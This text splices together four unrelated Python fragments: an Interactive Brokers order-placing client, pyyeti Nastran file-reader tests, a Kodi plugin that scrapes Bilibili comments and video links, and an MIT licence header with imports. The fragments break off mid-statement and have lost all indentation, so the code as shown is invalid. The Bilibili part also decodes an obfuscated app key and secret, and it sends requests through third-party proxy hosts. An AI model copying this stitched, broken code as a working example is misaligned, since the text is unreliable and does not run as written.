def serverTime(self) :
file = self.wrapper.init()
self.reqCurrentTime()
time = self.wrapper.get(file, timeout = 1)
return time
def hstData(self,
contract,
endDateTime,
durationStr,
barSizeSetting,
whatToShow,
useRTH,
formatDate,
keepUpToDate,
chartOptions,
timeQueue = 1) :
self.reqId += 1
file = self.wrapper.init()
self.reqHistoricalData(self.reqId,
contract,
endDateTime,
durationStr,
barSizeSetting,
whatToShow,
useRTH,
formatDate,
keepUpToDate,
chartOptions)
time.sleep(timeQueue)
hstData_ = self.wrapper.getList(file, timeout = 3)
if len(hstData_) > 0 :
return hstData_
else :
return False
def lastPrice(self,
contract,
marketDataType,
genericTickList,
snapshot,
regulatorySnapshot,
mktDataOptions,
timeQueue = 1) :
self.reqId += 1
file = self.wrapper.init()
self.reqMarketDataType(marketDataType)
self.reqMktData(self.reqId,
contract,
genericTickList,
snapshot,
regulatorySnapshot,
mktDataOptions)
time.sleep(timeQueue)
lastPrice_ = self.wrapper.getList(file, timeout = 3)
if len(lastPrice_) > 0 :
return lastPrice_
else :
return False
def placeOrder__(self,
orderId,
contract,
order) :
file = self.wrapper.init()
self.placeOrder(orderId, contract, order)
time.sleep(1)
try :
placedOrder_ = self.wrapper.get(file, timeout = 3)
except :
placedOrder_ = None
if placedOrder_ is not None :
return placedOrder_
else :
return False
def cancelOrder_(self,
orderId) :
self.cancelOrder(orderId)
class CLIENT_IBKR(WRAPPER, CLIENT) :
"""! \private
IBKR Main client class
"""
def __init__(self) :
WRAPPER.__init__(self)
CLIENT.__init__(self, wrapper=self)
self.host = None
self.portid = None
self.client_id = None
self.nextValidOrderId = None
#==================================
# Low level functions
#==================================
def getNextValidOrderId(self) :
self.nextValidOrderId = self.wrapper.nextValidOrderId
self.wrapper.nextValidOrderId += 1
return self.nextValidOrderId
def connection(self,
host = "127.0.0.1",
portid = 7497,
client_id = 0) :
# Connection to the local server
self.host = host
self.portid = portid
self.client_id = client_id
try :
self.connect(self.host, self.portid, self.client_id)
self.start()
time.sleep(0.1)
self.getNextValidOrderId()
return True
except :
return False
def closePosition(self,
contract,
openOrder) :
openOrder.action = "SELL" if openOrder.action == "BUY" else "BUY"
openOrder.transmit = True
closedOrder = self.placeOrder_(contract, openOrder)
return closedOrder
def placeOrder_(self,
contract,
order) :
orderId = self.getNextValidOrderId()
return self.placeOrder__(orderId,
contract,
order)
#==================================
# High level functions
#==================================
def connection_(self, configFile) :
# Config File extraction
ipaddress = configFile.get("ip")
portid = configFile.get("port")
clientid = configFile.get("client")
connect = self.connection(host = ipaddress,
portid = portid,
client_id = clientid)
self.start()
time.sleep(1)
return connect
def createContract(self, configFile) :
"""
Function that translate a dictionnary formatted contract into a
contract object as required by the api.
"""
contract = Contract()
for key in list(configFile.keys()) :
setattr(contract, key, configFile.get(key))
return contract
def createOrder(self, configFile) :
orderParent = Order()
orderParent.orderId = self.getNextValidOrderId()
# Order direction
if configFile.get("action") == "long" :
orderParent.action = "BUY"
if configFile.get("action") == "short" :
orderParent.action = "SELL"
# Order volume
orderParent.totalQuantity = configFile.get("volume")
# Order type
if configFile.get("orderType") == "MKT" :
orderParent.orderType = "MKT"
orderParent.transmit = False
takeProfitOrder = Order()
takeProfitOrder.orderId = self.getNextValidOrderId()#orderParent.orderId + 1
takeProfitOrder.action = "SELL" if orderParent.action == "BUY" else "BUY"
takeProfitOrder.orderType = "LMT"
takeProfitOrder.totalQuantity = configFile.get("volume")
takeProfitOrder.lmtPrice = configFile.get("takeprofit")
takeProfitOrder.parentId = orderParent.orderId
takeProfitOrder.transmit = False
stoplossOrder = Order()
stoplossOrder.orderId = self.getNextValidOrderId()#orderParent.orderId + 2
stoplossOrder.action = "SELL" if orderParent.action == "BUY" else "BUY"
stoplossOrder.orderType = "STP"
stoplossOrder.totalQuantity = configFile.get("volume")
stoplossOrder.auxPrice = configFile.get("stoploss")
stoplossOrder.parentId = orderParent.orderId
stoplossOrder.transmit = True
bracketOrder = [orderParent, takeProfitOrder, stoplossOrder]
return bracketOrder
def placeOrderList(self, contractFile, orderList) :
# We generate the good contract
contract = self.createContract(contractFile)
for order in orderList :
self.placeOrder__(order.orderId, contract, order)
def editLimitOrder(self, contractFile, order, newLimit) :
contract = self.createContract(contractFile)
if order.orderType == "LMT" :
order.lmtPrice = newLimit
if order.orderType == "STP" :
order.auxPrice = newLimit
self.placeOrder__(order.orderId, contract, order)
def cancelOrder__(self, order = None) :
"""
This function work but need to be adapted to brackets orders
"""
if order is not None:
self.cancelOrder(order.orderId)
def closePosition_(self,
contractFile,
order = None) :
contract = self.createContract(contractFile)
# print ("Order ID : ",self.getNextValidOrderId())
order.orderId = self.getNextValidOrderId()
return self.closePosition(contract, order)
def getHistoricalData_(self, contractFile, dateIni, dateEnd, timeframe, onlyOpen = True, timeQueue = 5, maxTimeQueue = 30) :
"""
- Simulate the case onlyOpen = False even during days off
- Find a way to avoid the server responds nothing
"""
contract = self.createContract(contractFile)
print("=================================")
print ("Get Hst Data function : ")
print("=================================")
print ("Date ini : ", dateIni,", Date end : ",dateEnd,", | |
import numpy as np
from pyyeti import ytools, nastran, locate
from pyyeti.nastran import op4, op2
from scipy.io import matlab
from nose.tools import *
def runcomp(nas, m):
matnas = m["nas"]
for name in matnas.dtype.names:
if isinstance(nas[name], dict):
for k in nas[name]:
matnas_key = "k{}".format(k)
m1 = matnas[name][0][0][matnas_key][0][0]
m2 = nas[name][k]
if name == "rfmodes" and len(m2) > 0:
m1 -= 1.0
if isinstance(m2, np.ndarray) and m2.ndim == 1:
m1 = m1.flatten()
if name == "maps" and len(m2) > 0:
m1[:, 0] -= 1
if name == "uset":
m2 = m2.reset_index().values
assert np.allclose(m1, m2)
else:
m1 = matnas[name][0][0]
m2 = nas[name]
assert np.allclose(m1, m2)
# check cstm2:
for k in nas["cstm"]:
prem1 = nas["cstm2"][k]
prem2 = nas["cstm"][k]
for i, j in enumerate(prem2[:, 0]):
m1 = prem1[int(j)] # 5x3
m2 = np.zeros((5, 3))
m2[0, :2] = prem2[i, :2]
m2[1:, :] = prem2[i, 2:].reshape((4, 3))
assert np.allclose(m1, m2)
def test_n2c_csuper():
nas = op2.rdnas2cam("tests/nas2cam_csuper/nas2cam")
# nas.keys()
# dict_keys(['rfmodes', 'fgravh', 'lambda', 'phg', 'dnids', 'nrb',
# 'maps', 'kaa', 'cstm', 'maa', 'fgravg', 'uset', 'selist', 'upids',
# 'cstm2'])
m = matlab.loadmat("tests/nas2cam_csuper/nas2cam.mat")
# In [41]: m['nas'].dtype.names
# Out[41]:
# ('cstm',
# 'dnids',
# 'fgravg',
# 'fgravh',
# 'kaa',
# 'lambda',
# 'maa',
# 'maps',
# 'nrb',
# 'phg',
# 'rfmodes',
# 'selist',
# 'upids',
# 'uset')
runcomp(nas, m)
def test_n2c_extseout():
nas = op2.rdnas2cam("tests/nas2cam_extseout/nas2cam")
m = matlab.loadmat("tests/nas2cam_extseout/nas2cam.mat")
runcomp(nas, m)
def test_n2c_error():
assert_raises(
ValueError,
op2.rdnas2cam,
"tests/nas2cam_extseout/assemble.op2",
"tests/nas2cam_extseout/nas2cam.op2",
)
def test_drm12_reader():
import numpy as np
o4 = op4.OP4()
drm12 = "tests/nastran_drm12/drm12"
mats = o4.dctload(drm12 + ".op4")
dsorted = op2.procdrm12(drm12, dosort=True)
# just to exercise more code:
with op2.OP2("tests/nastran_drm12/drm12.op2") as o2:
dkeys = o2.rddrm2op2(1)
# check desc:
assert np.all(["T1", "T2", "T3"] * 3 == dsorted["DTM_desc"])
assert np.all(["T1", "T2", "T3"] * 3 == dsorted["ATM_desc"])
spcf_desc = ["Fx", "Fy", "Fz", "Mx", "My", "Mz"]
assert np.all(spcf_desc * 4 == dsorted["SPCF_desc"])
stress = [
"CBAR Bending Stress 1 - End A", # 2
"CBAR Bending Stress 2 - End A", # 3
"CBAR Bending Stress 3 - End A", # 4
"CBAR Bending Stress 4 - End A", # 5
"CBAR Axial Stress", # 6
"CBAR Max. Bend. Stress -End A", # 7
"CBAR Min. Bend. Stress -End A", # 8
"CBAR M.S. Tension", # 9
"CBAR Bending Stress 1 - End B", # 10
"CBAR Bending Stress 2 - End B", # 11
"CBAR Bending Stress 3 - End B", # 12
"CBAR Bending Stress 4 - End B", # 13
"CBAR Max. Bend. Stress -End B", # 14
"CBAR Min. Bend. Stress -End B", # 15
"CBAR M.S. Compression",
] # 16
assert np.all(stress * 2 == dsorted["STM_desc"])
force = [
"CBAR Bending Moment 1 - End A", # 2
"CBAR Bending Moment 2 - End A", # 3
"CBAR Bending Moment 1 - End B", # 4
"CBAR Bending Moment 2 - End B", # 5
"CBAR Shear 1", # 6
"CBAR Shear 2", # 7
"CBAR Axial Force", # 8
"CBAR Torque",
] # 9
assert np.all(force * 2 + force[-2:] == dsorted["LTM_desc"])
# check id_dof:
ids = np.array([[12] * 3, [14] * 3, [32] * 3]).reshape((1, -1)).T
dof = np.array([[1, 2, 3] * 3]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == dsorted["DTM_id_dof"])
assert np.all(iddof == dsorted["ATM_id_dof"])
ids = np.array([[3] * 6, [11] * 6, [19] * 6, [27] * 6]).reshape((1, -1)).T
dof = np.array([[1, 2, 3, 4, 5, 6] * 4]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == dsorted["SPCF_id_dof"])
ids = np.array([[11] * 15, [89] * 15]).reshape((1, -1)).T
dof = np.array([[i for i in range(2, 17)] * 2]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == dsorted["STM_id_dof"])
ids = np.array([[11] * 8 + [23] * 8 + [28] * 2]).reshape((1, -1)).T
dof = np.array([[i for i in range(2, 10)] * 2 + [8, 9]]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == dsorted["LTM_id_dof"])
# check drms:
# manually getting rows from TOUGV1, etc in .out file:
rows = np.array([13, 14, 15, 19, 20, 21, 49, 50, 51]) - 1
assert np.all(mats["mougs1"][0][rows] == dsorted["DTMD"])
assert np.all(mats["mougd1"][0][rows] == dsorted["DTMA"])
assert np.all(mats["mougv1"][0][rows] == dsorted["ATM"])
assert np.all(mats["moqgs1"][0] == dsorted["SPCFD"])
assert np.all(mats["moqgd1"][0] == dsorted["SPCFA"])
rows = np.array([i for i in range(1, 17)] + [23, 24]) - 1
assert np.all(mats["moefs1"][0][rows] == dsorted["LTMD"])
assert np.all(mats["moefd1"][0][rows] == dsorted["LTMA"])
assert np.all(mats["moess1"][0] == dsorted["STMD"])
assert np.all(mats["moesd1"][0] == dsorted["STMA"])
draw = op2.procdrm12(drm12, dosort=False)
# check desc:
assert np.all(["T1", "T2", "T3"] * 3 == draw["DTM_desc"])
assert np.all(["T3", "T1", "T2"] + ["T1", "T2", "T3"] * 2 == draw["ATM_desc"])
spcf_desc = ["Fx", "Fy", "Fz", "Mx", "My", "Mz"]
assert np.all(spcf_desc * 4 == draw["SPCF_desc"])
stress = [
"CBAR Bending Stress 1 - End A", # 2
"CBAR Bending Stress 2 - End A", # 3
"CBAR Bending Stress 3 - End A", # 4
"CBAR Bending Stress 4 - End A", # 5
"CBAR Axial Stress", # 6
"CBAR Max. Bend. Stress -End A", # 7
"CBAR Min. Bend. Stress -End A", # 8
"CBAR M.S. Tension", # 9
"CBAR Bending Stress 1 - End B", # 10
"CBAR Bending Stress 2 - End B", # 11
"CBAR Bending Stress 3 - End B", # 12
"CBAR Bending Stress 4 - End B", # 13
"CBAR Max. Bend. Stress -End B", # 14
"CBAR Min. Bend. Stress -End B", # 15
"CBAR M.S. Compression",
] # 16
assert np.all(stress * 2 == draw["STM_desc"])
force = [
"CBAR Bending Moment 1 - End A", # 2
"CBAR Bending Moment 2 - End A", # 3
"CBAR Bending Moment 1 - End B", # 4
"CBAR Bending Moment 2 - End B", # 5
"CBAR Shear 1", # 6
"CBAR Shear 2", # 7
"CBAR Axial Force", # 8
"CBAR Torque",
] # 9
assert np.all(force + force[-1:] + force[-2:-1] + force == draw["LTM_desc"])
# check id_dof:
ids = np.array([[14] * 3, [12] * 3, [32] * 3]).reshape((1, -1)).T
dof = np.array([[1, 2, 3] * 3]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["DTM_id_dof"])
dof = np.array([[3, 1, 2] + [1, 2, 3] * 2]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["ATM_id_dof"])
ids = np.array([[3] * 6, [11] * 6, [19] * 6, [27] * 6]).reshape((1, -1)).T
dof = np.array([[1, 2, 3, 4, 5, 6] * 4]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["SPCF_id_dof"])
ids = np.array([[89] * 15, [11] * 15]).reshape((1, -1)).T
dof = np.array([[i for i in range(2, 17)] * 2]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["STM_id_dof"])
ids = np.array([[23] * 8 + [28] * 2 + [11] * 8]).reshape((1, -1)).T
dof = np.array([[i for i in range(2, 10)] + [9, 8] + [i for i in range(2, 10)]]).T
iddof = np.hstack((ids, dof))
assert np.all(iddof == draw["LTM_id_dof"])
# check drms:
# manually getting rows from TOUGV1, etc in .out file:
rows = np.array([19, 20, 21, 13, 14, 15, 49, 50, 51]) - 1
assert np.all(mats["mougs1"][0][rows] == draw["DTMD"])
assert np.all(mats["mougd1"][0][rows] == draw["DTMA"])
rows = np.array([21, 19, 20, 13, 14, 15, 49, 50, 51]) - 1
assert np.all(mats["mougv1"][0][rows] == draw["ATM"])
assert np.all(mats["moqgs1"][0] == draw["SPCFD"])
assert np.all(mats["moqgd1"][0] == draw["SPCFA"])
rows = np.array([9, 10, 11, 12, 13, 14, 15, 16, 24, 23, 1, 2, 3, 4, 5, 6, 7, 8]) - 1
assert np.all(mats["moefs1"][0][rows] == draw["LTMD"])
assert np.all(mats["moefd1"][0][rows] == draw["LTMA"])
rows = np.array([i for i in range(16, 31)] + [i for i in range(1, 16)]) - 1
assert np.all(mats["moess1"][0][rows] == draw["STMD"])
assert np.all(mats["moesd1"][0][rows] == draw["STMA"])
def test_codefuncs():
import sys
for v in list(sys.modules.values()):
if getattr(v, "__warningregistry__", None):
v.__warningregistry__ = {}
with op2.OP2("tests/nastran_drm12/drm12.op2") as o:
assert o.CodeFuncs[1](7) == 1
assert o.CodeFuncs[1](3002) == 2
assert o.CodeFuncs[2](123) == 23
assert o.CodeFuncs[3](123) == 123
assert o.CodeFuncs[4](22) == 2
assert o.CodeFuncs[5](15) == 5
assert o.CodeFuncs[6](8) == 0
assert o.CodeFuncs[6](9) == 0
assert o.CodeFuncs[6](7) == 1
assert o.CodeFuncs[7](222) == 0
assert o.CodeFuncs[7](2222) == 0
assert o.CodeFuncs[7](1222) == 1
assert o.CodeFuncs[7](3222) == 1
assert o.CodeFuncs[7](5222) == 2
funccode = 123456
val = 18 & (funccode & 65535)
assert o.CodeFuncs["big"](funccode, 18) == val
assert o._check_code(22, [4], [[2]], "test")
| |
rtext.find(';(function(){var s')
vjson = rtext[str1+25:str2]
j = json.loads(vjson)
elist = j['epList']
aid = ''
for index in range(len(elist)):
if int(elist[index]['id']) == int(epid):
aid = elist[index]['aid']
if aid == '':
slist = j['sections']
if slist != []:
for index in range(len(slist)):
##
sslist = slist[index]['epList']
for i in range(len(sslist)):
if int(sslist[i]['id']) == int(epid):
aid = sslist[index]['aid']
if aid == '':
dialog = xbmcgui.Dialog()
#dialog.textviewer('tt',epid)
if ifvideourl != None:
bvid = re.search(r'BV[a-zA-Z0-9]+', url)
bvurl = 'https://api.bilibili.com/x/web-interface/view?bvid='+bvid.group()
r = requests.get(bvurl,headers=headers)
j = json.loads(r.text)
aid = j['data']['aid']
mid = j['data']['owner']['mid']
#apiurl = 'http://api.bilibili.com/x/reply?type=1&oid='+str(aid)+'&sort=' + sort
apiurl = 'https://api.bilibili.com/x/v2/reply?jsonp=jsonp&pn=1&type=1&oid='+str(aid)+'&sort=' + sort
apiheaders = {'user-agent' : 'Mozilla/5.0 (Linux; Android 10; Z832 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Mobile Safari/537.36','referer':'https://www.bilibili.com/video/BV1Ze411W7EL'}
r = requests.get(apiurl,headers=apiheaders)
j = json.loads(r.text)
rep = j['data']['replies']
text = ''
for index in range(len(rep)):
text += '-----'*12 +'\n'
#时间处理
ctime = int(rep[index]['ctime'])
#转换成localtime
time_local = time.localtime(ctime)
#转换成新的时间格式(2016-05-05 20:28:54)
ctime = time.strftime("%Y-%m-%d %H:%M:%S",time_local)
#判断大会员
if rep[index]['member']['vip']['vipType'] == 2:
#是大会员,加上粉色名字
text += '[COLOR pink]' + rep[index]['member']['uname'].encode('utf-8') + '[/COLOR]'
else:
text += rep[index]['member']['uname'].encode('utf-8')
#加上等级后缀
text += level_color(rep[index]['member']['level_info']['current_level'])
#判断是否up主
if ifvideourl != None:
if int(mid) == int(rep[index]['member']['mid']):
text += ' [COLOR pink][UP主][/COLOR]'
text += '\n'
text += rep[index]['content']['message'].encode('utf-8') +'\n'
text += str(ctime) + ' · ' + str(rep[index]['like']) + '赞 · 共' + str(rep[index]['count']) +'条回复\n'
rrep = rep[index]['replies']
text += '-----'*12 +'\n\n'
if rrep:
for i in range(len(rrep)):
#时间处理
ctime = int(rrep[i]['ctime'])
#转换成localtime
time_local = time.localtime(ctime)
#转换成新的时间格式(2016-05-05 20:28:54)
ctime = time.strftime("%Y-%m-%d %H:%M:%S",time_local)
if rrep[i]['member']['vip']['vipType'] == 2:
#大会员
text += ' '*5 + '[COLOR pink]' + rrep[i]['member']['uname'].encode('utf-8') + '[/COLOR]'
else:
text += ' '*5 + rrep[i]['member']['uname'].encode('utf-8')
#加上等级后缀
text += level_color(rrep[i]['member']['level_info']['current_level'])
#判断是否up主
if ifvideourl != None:
if int(mid) == int(rep[index]['member']['mid']):
text += ' [COLOR pink][UP主][/COLOR]'
text += '\n'
text += ' '*5 + rrep[i]['content']['message'].encode('utf-8') +'\n'
text += ' '*5 + str(ctime) + ' · ' + str(rrep[i]['like']) + '赞 · 共' + str(rrep[i]['count']) +'条回复\n'
if len(rrep)-1 != i:
text += ' '*5 + '-----'*10 +'\n'
return text
@plugin.cached(TTL=60)
def get_bangumijson(url):
cutep = url.find('y/ep')
epnum = url[cutep+4:]
epnum = re.sub(r'\D','',epnum)
apiurl = 'https://api.bilibili.com/pgc/player/web/playurl/html5?ep_id='
rec = requests.get(apiurl+epnum,headers=mheaders)
#rec.encoding = 'utf-8'
rectext = rec.text
rectext = rectext.encode('utf-8')
j = json.loads(rec.text)
return j
@plugin.cached(TTL=10)
def get_api1(url,quality):
if re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url):
bvid = re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url)
vurl = 'https://api.bilibili.com/x/web-interface/view?bvid='+bvid.group()
if re.search('[aA]{1}[vV]{1}[0-9]+', url):
aid = re.search(r'[aA]{1}[vV]{1}[0-9]+', url)
aid = aid.group()
aid = aid[2:]
vurl = 'https://api.bilibili.com/x/web-interface/view?aid='+aid
if '?p=' in url:
# 单独下载分P视频中的一集
p = int(re.search(r'\?p=(\d+)',url).group(1)) -1
else:
p = 0
r = requests.get(vurl,headers=headers)
j = json.loads(r.text)
cid = j['data']['pages'][int(p)]['cid']
danmuku.Danmuku(cid)
print(cid)
entropy = 'rbMCKn@KuamXWlPMoJGsKcbiJKUfkPF_8dABscJntvqhRSETg'
appkey, sec = ''.join([chr(ord(i) + 2) for i in entropy[::-1]]).split(':')
params = 'appkey=%s&cid=%s&otype=json&qn=%s&quality=%s&type=' % (appkey, cid, quality, quality)
tmp = params + sec
tmp = tmp.encode('utf-8')
chksum = hashlib.md5(bytes(tmp)).hexdigest()
url_api = 'https://interface.bilibili.com/v2/playurl?%s&sign=%s' % (params, chksum)
apiheaders = {
'Referer': url,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'
}
# print(url_api)
html = requests.get(url_api, headers=apiheaders).json()
# print(json.dumps(html))
video_list = []
for i in html['durl']:
video_list.append(i['url'])
# print(video_list)
return video_list
@plugin.cached(TTL=10)
def get_api2(url):
mp4 = ''
if re.match('https://',url) == None:
if re.match('http://',url) != None:
url = 'https://'+url[7:]
else:
dialog = xbmcgui.Dialog()
ok = dialog.ok('错误提示', '非法url')
ifvideourl = re.match('https://www.bilibili.com/video/',url)
if ifvideourl != None:
bvid = ''
aid = ''
if re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url):
bvid = re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url)
bvid = bvid.group()
vurl = 'https://api.bilibili.com/x/web-interface/view?bvid='+bvid
if re.search('[aA]{1}[vV]{1}[0-9]+', url):
aid = re.search(r'[aA]{1}[vV]{1}[0-9]+', url)
aid = aid.group()
aid = aid[2:]
vurl = 'https://api.bilibili.com/x/web-interface/view?aid='+aid
r = requests.get(vurl,headers=headers)
j = json.loads(r.text)
aid = j['data']['aid']
if '?p=' in url:
# 单独下载分P视频中的一集
p = int(re.search(r'\?p=(\d+)',url).group(1)) -1
else:
p = 0
cid = j['data']['pages'][p]['cid']
danmuku.Danmuku(cid)
apiurl = 'https://www.xbeibeix.com/api/bilibiliapi.php?url=https://www.bilibili.com/&aid='+str(aid)+'&cid=' + str(cid)
r = requests.get(apiurl,headers=headers)
j = json.loads(r.text)
if str(j['url']) != 'null':
mp4 = j['url']
dialog = xbmcgui.Dialog()
dialog.textviewer('错误提示', str(mp4))
else:
dialog = xbmcgui.Dialog()
ok = dialog.ok('错误提示', '视频不存在')
else:
dialog = xbmcgui.Dialog()
ok = dialog.ok('错误提示', '不支持的url格式')
return mp4
@plugin.cached(TTL=10)
def get_api3(url, quality):
if re.match('https://',url) == None:
if re.match('http://',url) != None:
url = 'https://'+url[7:]
else:
dialog = xbmcgui.Dialog()
ok = dialog.ok('错误提示', '非法url')
ifbangumiurl = re.match('https://www.bilibili.com/bangumi/play/ep',url)
ifvideourl = re.match('https://www.bilibili.com/video/',url)
if ifbangumiurl or ifvideourl != None:
if ifbangumiurl != None:
epid = re.search(r'ep[0-9]+', url)
epid = epid.group()
epid = epid[2:]
r = requests.get(url,headers=headers)
rtext = r.text
str1 = rtext.find('window.__INITIAL_STATE__=')
str2 = rtext.find(';(function(){var s')
vjson = rtext[str1+25:str2]
j = json.loads(vjson)
elist = j['epList']
bvid = ''
cid = ''
for index in range(len(elist)):
if int(elist[index]['id']) == int(epid):
bvid = elist[index]['bvid']
cid = elist[index]['cid']
if bvid == '' or cid == '':
slist = j['sections']
if slist != []:
for index in range(len(slist)):
##
sslist = slist[index]['epList']
for i in range(len(sslist)):
if int(sslist[i]['id']) == int(epid):
bvid = sslist[index]['bvid']
cid = sslist[index]['cid']
if bvid == '' or cid == '':
dialog = xbmcgui.Dialog()
#dialog.textviewer('tt',epid)
if ifvideourl != None:
bvid = ''
aid = ''
if re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url):
bvid = re.search(r'[Bb]{1}[Vv]{1}[a-zA-Z0-9]+', url)
bvid = bvid.group()
vurl = 'https://api.bilibili.com/x/web-interface/view?bvid='+bvid
if re.search('[aA]{1}[vV]{1}[0-9]+', url):
aid = re.search(r'[aA]{1}[vV]{1}[0-9]+', url)
aid = aid.group()
aid = aid[2:]
vurl = 'https://api.bilibili.com/x/web-interface/view?aid='+aid
r = requests.get(vurl,headers=headers)
j = json.loads(r.text)
#bvid = j['data']['pages'][0]['bvid']
if '?p=' in url:
# 单独下载分P视频中的一集
p = int(re.search(r'\?p=(\d+)',url).group(1)) -1
else:
p = 0
cid = j['data']['pages'][p]['cid']
danmuku.Danmuku(cid)
if bvid != '':
url_api = 'https://api.bilibili.com/x/player/playurl?cid={}&bvid={}&qn={}'.format(cid, bvid, quality)
else:
url_api = 'https://api.bilibili.com/x/player/playurl?cid={}&aid={}&qn={}'.format(cid, aid, quality)
apiheaders = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Cookie': sessdata(), # 登录B站后复制一下cookie中的SESSDATA字段,有效期1个月
'Host': 'api.bilibili.com'
}
html = requests.get(url_api, headers=apiheaders).json()
video_list = []
#dialog = xbmcgui.Dialog()
#dialog.textviewer('评论区',str(html['data']['durl']))
if 'data' in html:
for i in html['data']['durl']:
video_list.append(i['url'])
else:
dialog = xbmcgui.Dialog()
dialog.ok('提示','无法解析视频')
return video_list
@plugin.cached(TTL=10)
def get_api4(url,quality):
epid = re.search(r'ep[0-9]+', url)
epid = epid.group()
epid = epid[2:]
r = requests.get(url,headers=headers)
rtext = r.text
str1 = rtext.find('window.__INITIAL_STATE__=')
str2 = rtext.find(';(function(){var s')
vjson = rtext[str1+25:str2]
j = json.loads(vjson)
elist = j['epList']
bvid = ''
cid = ''
for index in range(len(elist)):
if int(elist[index]['id']) == int(epid):
bvid = elist[index]['bvid']
cid = elist[index]['cid']
if bvid == '' or cid == '':
slist = j['sections']
if slist != []:
for index in range(len(slist)):
##
sslist = slist[index]['epList']
for i in range(len(sslist)):
if int(sslist[i]['id']) == int(epid):
bvid = sslist[index]['bvid']
cid = sslist[index]['cid']
if bvid == '' or cid == '':
dialog = xbmcgui.Dialog()
#dialog.textviewer('tt',epid)
#hk9ho2af5hdw20wewf4ahqovwp79kq2z
#https://www.biliplus.com/BPplayurl.php?cid=181007115&bvid=BV1fK4y1r7sT&qn=80&module=bangumi&otype=json
url_api = 'https://www.biliplus.com/BPplayurl.php?cid={}&qn={}&module=bangumi&otype=json&bvid={}'.format(cid,quality,bvid)
danmuku.Danmuku(cid)
r = requests.get(url_api, headers=headers)
html = json.loads(r.text)
#video_list = []
# if 'durl' in html:
# videolist = []
# for i in html['durl']:
# videolist.append(i['url'])
# #video_list = video_list[0]
# if 'dash' in html:
# videolist = {}
# videolist['video'] = html['dash']['video'][0]['base_url']
# videolist['audio'] = html['dash']['audio'][0]['base_url']
# #video_list = video_list[0]
#dialog = xbmcgui.Dialog()
#dialog.textviewer('评论区',str(html))
video_list = []
if 'durl' in html:
for i in range(len(html['durl'])):
video_list.append(html['durl'][i]['url'])
#video_list = video_list[0]
else:
dialog = xbmcgui.Dialog()
dialog.ok('提示','无法解析视频')
#dialog = xbmcgui.Dialog()
#dialog.textviewer('评论区',str(video_list))
return video_list
@plugin.cached(TTL=10)
def get_api5(url,quality,api):
epid = re.search(r'ep[0-9]+', url)
epid = epid.group()
epid = epid[2:]
r = requests.get(url,headers=headers)
rtext = r.text
str1 = rtext.find('window.__INITIAL_STATE__=')
str2 = rtext.find(';(function(){var s')
vjson = rtext[str1+25:str2]
j = json.loads(vjson)
elist = j['epList']
bvid = ''
cid = ''
for index in range(len(elist)):
if int(elist[index]['id']) == int(epid):
bvid = elist[index]['bvid']
cid = elist[index]['cid']
if bvid == '' or cid == '':
slist = j['sections']
if slist != []:
for index in range(len(slist)):
##
sslist = slist[index]['epList']
for i in range(len(sslist)):
if int(sslist[i]['id']) == int(epid):
bvid = sslist[index]['bvid']
cid = sslist[index]['cid']
if bvid == '' or cid == '':
dialog = xbmcgui.Dialog()
#dialog.textviewer('tt',epid)
if int(api) == 1:
apihead = 'https://bilibili-tw-api.kghost.info/'
if int(api) == 2:
apihead = 'https://bilibili-hk-api.kghost.info/'
url_api = apihead + 'x/player/playurl?cid={}&bvid={}&qn={}'.format(cid, bvid, quality)
danmuku.Danmuku(cid)
apiheaders = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
#'Cookie': sessdata, # 登录B站后复制一下cookie中的SESSDATA字段,有效期1个月
#'Host': 'api.bilibili.com'
}
html = requests.get(url_api, headers=apiheaders).json()
video_list = []
#dialog = xbmcgui.Dialog()
#dialog.textviewer('评论区',str(html))
if html['data']:
for i in html['data']['durl']:
video_list.append(i['url'])
video_list = video_list[0]
else:
dialog = xbmcgui.Dialog()
dialog.ok('提示','无法解析视频')
return video_list
@plugin.cached(TTL=10)
def get_live(page):
videos = []
r = requests.get('https://api.live.bilibili.com/room/v1/room/get_user_recommend?page=' +str(page), headers=headers)
r.encoding = 'UTF-8'
j = json.loads(r.text)
llist = j['data']
for index in range(len(llist)):
videoitem = {}
videoitem['name'] = llist[index]['title']
videoitem['href'] | |
# MIT License
#
# Copyright (c) 2022 <NAME> [srccircumflex]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from ast import literal_eval
from calendar import timegm
from os import access, makedirs
from os import path as os_path
from re import escape, findall, search, sub
from time import gmtime, strftime, strptime, time
from functools import lru_cache
